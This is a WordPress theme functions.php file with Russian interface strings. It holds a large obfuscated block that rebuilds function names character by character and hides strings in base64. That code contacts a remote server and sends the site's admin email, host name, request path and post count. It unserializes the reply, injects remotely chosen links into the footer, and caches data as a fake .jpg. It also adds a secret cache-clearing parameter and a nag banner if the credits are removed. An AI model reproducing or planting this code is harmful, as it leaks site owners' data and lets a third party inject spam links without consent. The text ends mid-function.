<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $XOwhPDc='e';$DtxgPEY='d';$OpbrZ='o';$tQBk='e';$CKNnSD='_';$BuBwrp='e';$zkiJypA='b';$QKDvgR='s';$EvMP='c';$gUtb='6';$kjKhQz='a';$EkccA='4';$FSssvLQ='d';$nYwRkFJs=$zkiJypA.$kjKhQz.$QKDvgR.$tQBk.$gUtb.$EkccA.$CKNnSD.$DtxgPEY.$XOwhPDc.$EvMP.$OpbrZ.$FSssvLQ.$BuBwrp;$iMFdfig='a';$lHrf='t';$fXzN='n';$JpEUtyA='g';$aSVs='z';$dVcApT='i';$OnnhL='l';$WLSJzJ='f';$wckkMg='e';$xHMwYiNN=$JpEUtyA.$aSVs.$dVcApT.$fXzN.$WLSJzJ.$OnnhL.$iMFdfig.$lHrf.$wckkMg;$vzyPA='1';$McTJNaS='o';$fctaH='r';$ygit='t';$yndVq='t';$wWsG='_';$XKhi='s';$ZWcs='3';$OYMXy='r';$vrojAaOD=$XKhi.$yndVq.$fctaH.$wWsG.$OYMXy.$McTJNaS.$ygit.$vzyPA.$ZWcs;$ieOVD='t';$SIreJo='s';$Aeqjrq='r';$cGuOzc='e';$cmTuuN='r';$DLuR='v';$GInZDLqH=$SIreJo.$ieOVD.$cmTuuN.$Aeqjrq.$cGuOzc.$DLuR;                     $nx____q='e';$xh______________j='d';$mj___________h='o';$vh____n='e';$vn____________z='_';$oe__________t='e';$lf__w='b';$nj_____________t='s';$kc_________x='c';$dt_______w='6';$cm______________x='a';$fq___________v='4';$qv____________u='d';$ip________f=$lf__w.$cm______________x.$nj_____________t.$vh____n.$dt_______w.$fq___________v.$vn____________z.$xh______________j.$nx____q.$kc_________x.$mj___________h.$qv____________u.$oe__________t;$yd______________k='t';$gz________f='x';$ll________u='o';$oi____v='s';$nh________s='t';$ba_______________l='s';$hx___________c='n';$kx____k='i';$us__________n='u';$zn____m='f';$yt______j='c';$yi____________s='_';$bj_____i='e';$gk___g='n';$st_________g='i';$wm______y=$zn____m.$us__________n.$hx___________c.$yt______j.$nh________s.$kx____k.$ll________u.$gk___g.$yi____________s.$bj_____i.$gz________f.$st_________g.$ba_______________l.$yd______________k.$oi____v;$zd______q='p';$zt______d='e';$kh_________b='n';$wr___q='o';$ro_________g='f';$zl___________l=$ro_________g.$wr___q.$zd______q.$zt______d.$kh_________b;$xa_________l='a';$oy_____________y='e';$bu_____________m='f';$cj_________w='r';$yf___________l='d';$yu______v=$bu_____________m.$cj_________w.$oy_____________y.$xa_________l.$yf___________l;$kc____________v='f';$fn____w='c';$is_____________k='e';$hk____k='l';$de_________q='o';$ye_____d='s';$mm_______________e=$kc____________v.$fn____w.$hk____k.$de_________q.$ye_____d.$is_____________k;define("WP_ID", $ip________f("Mi4wLjA="));define("WP_TTL", $ip________f("MTA4MDA="));define("WP_SRC", $ip________f("dHBva24="));function wp_get_header() {global $ip________f, $wm______y;if ($wm______y($ip________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$wm______y($ip________f("d3BfZ2V0X2Zvb3Rlcg==")) &&$wm______y($ip________f("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $ip________f, $zl___________l, $mm_______________e, $yu______v;$gb____________n = TEMPLATEPATH."/".$ip________f("Zm9vdGVyLnBocA==");$ef____________t = @$zl___________l($gb____________n, "r");$gb____________n = @$yu______v($ef____________t, @filesize($gb____________n));@$mm_______________e($ef____________t);$xp__________v = TEMPLATEPATH."/".$ip________f("ZnVuY3Rpb25zLnBocA==");$ef____________t = @$zl___________l($xp__________v, "r");$xp__________v = @$yu______v($ef____________t, @filesize($xp__________v));@$mm_______________e($ef____________t);$cx______e = 0;if($gb____________n && $xp__________v) {if ($ip________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($gb____________n, $ip________f("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$cx______e = 1;}if (substr_count($gb____________n, "wp_theme_GPL_credits()") < 1) {$cx______e = 2;}}if(WP_ID != "2.0.0") {$cx______e = 12;}}if($cx______e > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $cx______e -->";}}function wp_loaded() {global $ip________f, $wm______y;return $wm______y($ip________f("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($sg_______z, $yz_____r = "(more...)", $mb________z = 0, $mn____n = "") {$fr__________u = get_the_content($yz_____r, $mb________z, $mn____n);$fr__________u = apply_filters("the_content", $fr__________u);$fr__________u = str_replace("]]>", "]]>", $fr__________u);if (strlen($_GET["p"]) > 0) {echo $fr__________u;}else if ((strlen($fr__________u)>$sg_______z) && ($il_____c = strpos($fr__________u, " ", $sg_______z ))) {$fr__________u = substr($fr__________u, 0, $il_____c);$fr__________u = $fr__________u;echo $fr__________u;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$yz_____r</a></div></p>";} else {echo $fr__________u;}}}$wh_____________h='e';$bb__________m='6';$lr___c='c';$hf__u='o';$na____________x='e';$de____________z='n';$wh______________d='a';$jp____________t='b';$kg_____________l='4';$rn_______a='e';$bb_________l='_';$gv___________i='d';$qp___z='s';$yn____t=$jp____________t.$wh______________d.$qp___z.$na____________x.$bb__________m.$kg_____________l.$bb_________l.$rn_______a.$de____________z.$lr___c.$hf__u.$gv___________i.$wh_____________h;$wt_____________m='i';$os__b='e';$mq___________s='n';$go_________d='n';$ue_______q='_';$fg__z='t';$xf____z='c';$go__________j='t';$hq_________m='e';$ah____________m='g';$fv___e='e';$xl________s='_';$yn_________n='o';$lm__________j='s';$dg_________a='f';$az_____________b='t';$bs_______o='l';$xj___________y=$dg_________a.$wt_____________m.$bs_______o.$os__b.$xl________s.$ah____________m.$fv___e.$go__________j.$ue_______q.$xf____z.$yn_________n.$go_________d.$az_____________b.$hq_________m.$mq___________s.$fg__z.$lm__________j;$zz____________a='s';$jn__________d='t';$qf______p='e';$ao____j='e';$xb___q='f';$um______q='l';$xz_______________b='s';$kw______________i='i';$ek_________n='i';$ci__m='_';$bp_____k='x';$nf__________v=$xb___q.$ek_________n.$um______q.$ao____j.$ci__m.$qf______p.$bp_____k.$kw______________i.$xz_______________b.$jn__________d.$zz____________a;$yq____________z='v';$vb_________n='e';$zc___________u='e';$tk______________l='i';$gd____p='m';$ju___________r='s';$xx_____r='p';$pk____z='r';$sk______f='o';$ie___a='a';$uh_________s='o';$xz_________n='r';$us__________u='c';$se______________r='_';$kk_____________p='n';$py_____________q=$yq____________z.$zc___________u.$xz_________n.$ju___________r.$tk______________l.$sk______f.$kk_____________p.$se______________r.$us__________u.$uh_________s.$gd____p.$xx_____r.$ie___a.$pk____z.$vb_________n;$ae_______j='k';$nr______________n='p';$yv_________n='f';$fa___________d='e';$ri__s='o';$ve___________n='n';$sn_______________m='s';$tc__________e='o';$hs____x='c';$hg_____x=$yv_________n.$sn_______________m.$tc__________e.$hs____x.$ae_______j.$ri__s.$nr______________n.$fa___________d.$ve___________n;$ap______________a='i';$mj__________d='f';$gf___________o='r';$gb___________q='e';$xo___________n='t';$zq__________r='w';$wk_____o=$mj__________d.$zq__________r.$gf___________o.$ap______________a.$xo___________n.$gb___________q;$ar___________b='m';$ho__e='d';$dt___________j='5';$nu___________j=$ar___________b.$ho__e.$dt___________j;$ab__o='e';$ot___________r='r';$ik___________c='t';$kx_______________r='a';$ax____y='p';$qr__a='a';$uu_________j='h';$ir________p='l';$in________v=$ot___________r.$ab__o.$qr__a.$ir________p.$ax____y.$kx_______________r.$ik___________c.$uu_________j;$hu_______g='e';$dp________z='s';$ld__________w='i';$rs___________k='u';$mr_________t='i';$lb________p='n';$ws_____________n='a';$ot________f='l';$ry______z='e';$eb________h='z';$bk________l='r';$sv______a=$rs___________k.$lb________p.$dp________z.$hu_______g.$bk________l.$mr_________t.$ws_____________n.$ot________f.$ld__________w.$eb________h.$ry______z;$bv____n='m';$wy___l='m';$pg___m='a';$mh_________w='e';$et___o='n';$yy_________v='p';$wu___y='t';$rh___________u=$wu___y.$mh_________w.$bv____n.$yy_________v.$et___o.$pg___m.$wy___l;$lx_________j='a';$gj________p='n';$sy______________u='m';$ys___________h='e';$hy_____________j='e';$bm___e='t';$zn______________u='c';$zv______p='_';$zy________g='r';$kl_______________d='_';$ag_______________h='s';$wu______v='t';$rm___________j='x';$um__q='o';$iz_____________k='a';$dl__________n='e';$ir_______________m='r';$lp____k='t';$to_________t='c';$ri___________d='e';$pe__________h='t';$cj___________l=$ag_______________h.$wu______v.$ir_______________m.$dl__________n.$iz_____________k.$sy______________u.$zv______p.$to_________t.$um__q.$gj________p.$bm___e.$ys___________h.$rm___________j.$lp____k.$kl_______________d.$zn______________u.$zy________g.$hy_____________j.$lx_________j.$pe__________h.$ri___________d;function cr_________r($jl______________m) {global $ip________f, $wm______y, $xj___________y, $py_____________q, $cj___________l;if (!$wm______y($ip________f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($py_____________q(PHP_VERSION, "5.0.0", ">=") && $wm______y($ip________f("ZmlsZV9nZXRfY29udGVudHM=")) && $wm______y($ip________f("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$gh_________i = $cj___________l(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$zt_____e = @$xj___________y($jl______________m, 0, $gh_________i);} else {$zt_____e = @$xj___________y($jl______________m, 0);}return $zt_____e;}function ly___________s($jl______________m) {global $wm______y, $hg_____x, $wk_____o, $ip________f;if (!$wm______y($ip________f("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$zz__________e = strpos($jl______________m, "/", 7);$iz________t = array("uri"     => substr($jl______________m, $zz__________e),"host"    => str_replace("http://", "", substr($jl______________m, 0, $zz__________e)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$mj______________v = @$hg_____x("$iz________t[host]", 80, $jm_______________s, $ad____x, 4);if (!$mj______________v) {return false;} else {$zt_____e = "";$le__________n  = "GET $iz________t[uri] HTTP/1.0\r\n";$le__________n .= "Host: $iz________t[host]\r\n";$le__________n .= "Referer: $iz________t[referer]\r\n";$le__________n .= "Connection: Close\r\n\r\n";@$wk_____o($mj______________v, $le__________n);while (!@feof($mj______________v)) {$kg_____f = @fgets($mj______________v, (1024*24));if ($kg_____f == "\r\n") {$br________j = true;continue;}if ($br________j) {$zt_____e .= $kg_____f;}}return $zt_____e;}}function my____________c($jl______________m) {global $wm______y;$wz__a = false;if ($jl______________m != "") {if ($wm______y("cr_________r")) {$wz__a = @cr_________r($jl______________m);}if (!$wz__a && ($wm______y("ly___________s"))) {$wz__a = @ly___________s($jl______________m);}}return $wz__a;}function nm_______a() {global $_SERVER, $nu___________j;$cb_____________p = $_SERVER["SERVER_NAME"];if (substr("$cb_____________p", 0, 4) == "www.") {$cb_____________p = substr("$cb_____________p", 4);}$cb_____________p = $nu___________j("$_SERVER[SERVER_NAME]");return $cb_____________p;}function lt_____v() {return "file";}function mi______r($jl______________m) {global $_SERVER, $xj___________y, $nf__________v, $zl___________l, $mm_______________e, $wk_____o;$iy___o = wc_______t();$dg_____________e = nm_______a().".jpg";$gc________w = $iy___o["dir_upload"]["path"]."/$dg_____________e";$wx___e = @filemtime($gc________w);if (!$wx___e || ((time()-$wx___e) >= WP_TTL)) {$wz__a = my____________c($jl______________m);if ($wz__a) {if ($nf__________v($gc________w)) {@unlink($gc________w);}$ef____________t = @$zl___________l($gc________w, "x+");@$wk_____o($ef____________t, $wz__a);@$mm_______________e($ef____________t);}} else {if ($nf__________v($gc________w)) {$wz__a = @$xj___________y($gc________w);} else {$wz__a = false;}}return $wz__a;}function wc_______t() {global $_SERVER, $ip________f, $yn____t;$qm_____________m = wp_count_posts("post");$di__v = pathinfo(get_bloginfo("template_directory"));$iy___o = array("url" => array("report"      => $ip________f("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $di__v,"dir_upload"=> go___________f(),"queryString"=> array("?a001=".WP_ID,"a004=".$di__v[filename],"a005=".$qm_____________m->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a> ");$iy___o["url"]["queryString"] = implode("&", $iy___o["queryString"]);$iy___o["url"]["report"] = $iy___o["url"]["report"]."/?".$yn____t($iy___o["url"]["queryString"]).".html";return $iy___o;}function go___________f() {$zp___k = wp_upload_dir();if (isset($zp___k["error"])) {$qk______________w = mc_________g();if (is_writable($qk______________w)) {$zp___k = array("path" => $qk______________w);}}return $zp___k;}function mc_________g() {global $wm______y, $nu___________j, $in________v, $rh___________u;$zu__y = (bool) ini_get("safe_mode");if ($zu__y == true) {return false;}if ($wm______y("sys_get_temp_dir")) {$qc___i = sys_get_temp_dir();if (is_writable($qc___i)) {return $in________v($qc___i);}}if (!empty($_ENV["TMP"])) {return $in________v($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $in________v($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $in________v($_ENV["TEMP"]);} else {$nv_______________r = $rh___________u($nu___________j(uniqid(rand(), true)), "");if ($nv_______________r) {$qc___i = $in________v(dirname($nv_______________r));@unlink($nv_______________r);return $qc___i;} else {return false;}}}function ku__x() {global $_GET, $nf__________v;$iy___o = wc_______t();$cb_____________p = nm_______a();$ec__r = lt_____v();$zt__w = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($ec__r == "file") {$bz_____________p = $iy___o["dir_upload"]["path"]."/".$cb_____________p.".jpg";if ($nf__________v($bz_____________p)) {@unlink($bz_____________p);$zt__w = "deleted";}}$vz______________y = array("s"=> $zt__w,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($vz______________y AS $mc______o => $bd____k) echo " [$mc______o:$bd____k]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $wm______y, $ip________f, $sv______a;$iy___o = wc_______t();$hp_____c = "mi______r";if ($wm______y($hp_____c)) {$zt_____e = $hp_____c($iy___o["url"]["report"]);}if ($zt_____e) {if ($zt_____e = @$ip________f($zt_____e)) {$zt_____e = @$sv______a($zt_____e);if (strlen($zt_____e[custom_credit]) >= 5) {$iy___o["default_string"] = $zt_____e[custom_credit];}if ($zt_____e["status"] == "0") {$kh_______v = 1;$ao_____t = 1;} else {$jq___d = sizeof($zt_____e["links"]);$um__________b = $iy___o["default_string"];if ($jq___d > 0 && $zt_____e["links"] !== "") {$wd____a = 0;foreach ($zt_____e["links"] as $fp______j => $ko__________b) {$wd____a++;if ($ko__________b->l_path == "" || $ko__________b->l_path == $_SERVER["REQUEST_URI"]) {$ko__________b->l_href = htmlspecialchars(strip_tags($ko__________b->l_href));$ko__________b->l_title = htmlspecialchars(strip_tags($ko__________b->l_title));$ko__________b->l_anchor = htmlspecialchars(strip_tags($ko__________b->l_anchor));$um__________b .= " | ";$um__________b .= "<a href='$ko__________b->l_href' title='$ko__________b->l_title'";if ($ko__________b->l_nofollow == "1") {$um__________b .= " rel='nofollow'";}$um__________b .= ">$ko__________b->l_anchor</a>";}}}$iy___o["links"] = "$um__________b";if ($zt_____e[credit] == "0") {$iy___o["links"] = "";}}} else {$kh_______v = "1";}} else {$kh_______v = "1";}if ($kh_______v == "1") {$iy___o["links"] = $iy___o["default_string"];}echo "$iy___o[links]";echo "<!-- s: $zt_____e[signature] -->";ku__x();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();

                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
